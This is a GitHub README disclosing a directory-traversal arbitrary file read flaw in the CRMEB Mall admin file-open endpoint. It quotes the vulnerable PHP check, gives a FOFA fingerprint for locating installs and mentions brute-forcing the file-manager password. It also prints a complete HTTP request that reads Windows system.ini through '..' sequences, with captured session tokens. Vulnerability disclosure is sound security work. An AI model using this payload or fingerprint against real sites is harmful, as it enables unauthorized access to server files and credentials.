Skip to content

Echosssy/-CRMEB-Mall-commercial-version-of-any-file-read-vulnerability

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 

Repository files navigation

众邦科技CRMEB Mall commercial version of any file read vulnerability Source-codes:https://gitee.com/ZhongBangKeJi/CRMEB 源码归属:众邦科技 image image

company's official website:https://www.crmeb.com/ fofa:icon_hash="-847565074" image

Code audit public function openfile($filepath) { //根目录 $rootDir = $this->formatPath(app()->getRootPath()); //防止查看站点以外的文件 if (strpos($filepath, $rootDir) === false || $filepath == '') { throw new AdminException('无法打开站点以外的文件'); }

    $filepath = $this->formatPath($filepath);
    $content = FileClass::readFile($filepath);//防止页面内嵌textarea标签
    $ext = FileClass::getExt($filepath);
    $encoding = mb_detect_encoding($content, mb_detect_order());
    //前端组件支持的语言类型
    //['plaintext', 'json', 'abap', 'apex', 'azcli', 'bat', 'cameligo', 'clojure', 'coffeescript', 'c', 'cpp', 'csharp', 'csp', 'css', 'dart', 'dockerfile', 'fsharp', 'go', 'graphql', 'handlebars', 'hcl', 'html', 'ini', 'java', 'javascript', 'julia', 'kotlin', 'less', 'lexon', 'lua', 'markdown', 'mips', 'msdax', 'mysql', 'objective-c', 'pascal', 'pascaligo', 'perl', 'pgsql', 'php', 'postiats', 'powerquery', 'powershell', 'pug', 'python', 'r', 'razor', 'redis', 'redshift', 'restructuredtext', 'ruby', 'rust', 'sb', 'scala', 'scheme', 'scss', 'shell', 'sol', 'aes', 'sql', 'st', 'swift', 'systemverilog', 'verilog', 'tcl', 'twig', 'typescript', 'vb', 'xml', 'yaml']

    $extarray = [
        'js' => 'javascript'
        , 'htm' => 'html'
        , 'shtml' => 'html'
        , 'html' => 'html'
        , 'xml' => 'xml'
        , 'php' => 'php'
        , 'sql' => 'mysql'
        , 'css' => 'css'
        , 'txt' => 'plaintext'
        , 'vue' => 'html'
        , 'json' => 'json'
        , 'lock' => 'json'
        , 'md' => 'markdown'
        , 'bat' => 'bat'
        , 'ini' => 'ini'


    ];
    $mode = empty($extarray[$ext]) ? 'php' : $extarray[$ext];
    return compact('content', 'mode', 'filepath', 'encoding');
}

//调用的readfile函数直接调用file_get_contents public static function readFile(string $file) { return @file_get_contents($file); }

The vulnerability point in this code code is intended to only open files within the root directory of the website, but you can use directory traversal to bypass if (strpos($filepath, $rootDir) === false || $filepath == '') { throw new AdminException('无法打开站点以外的文件'); }

As long as the filepath string contains rootdir, false can be returned to access other sensitive files through the matching directory The interface is: /adminapi/system/file/openfile Vulnerability recurrence Click File management as shown below to enter the password password can burst image

Once inside, click on any file to edit it image

The absolute path is found in the packet captured image

The rootdir in the code is: C:\phpstudy_pro1\WWW\ crmeb-master \CRMEB (usually when the front end sends data packets directly given without blasting)

Constructs payload to read system.ini GET /adminapi/system/file/openfile?filepath=C:\phpstudy_pro1\WWW\CRMEB-master\crmeb\..\..\..\..\Windows\system.ini&fileToken=a151c0055dd6ad351587ba743cd64bd0 HTTP/1.1 Host: 192.168.242.142:89 Accept: application/json, text/plain, / Authori-zation: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiIwZmQ0Yjc1ZTA2Nzc5MjMwOTdlZThlNmQzYTdkZTQwMSIsImlzcyI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImF1ZCI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImlhdCI6MTcwNjk0OTQ5OCwibmJmIjoxNzA2OTQ5NDk4LCJleHAiOjE3MDk1NDE0OTgsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.sz3bKZVjTcXJZAleAahllknbcQjgR-4kl9zWAJ4aybM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Referer: http://192.168.242.142:89/admin/system/maintain/system_file/opendir Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: uuid=1; WS_ADMIN_URL=ws://192.168.242.142:89/notice; WS_CHAT_URL=ws://192.168.242.142:89/msg; cb_lang=zh-cn; PHPSESSID=7ead6c57e767cbd757d0154f40bd9bb5; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiIwZmQ0Yjc1ZTA2Nzc5MjMwOTdlZThlNmQzYTdkZTQwMSIsImlzcyI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImF1ZCI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImlhdCI6MTcwNjk0OTQ5OCwibmJmIjoxNzA2OTQ5NDk4LCJleHAiOjE3MDk1NDE0OTgsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.sz3bKZVjTcXJZAleAahllknbcQjgR-4kl9zWAJ4aybM; expires_time=1709541498; file_token=a151c0055dd6ad351587ba743cd64bd0 Connection: close

You can see that the directory can be traversed because it is not filtered image

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published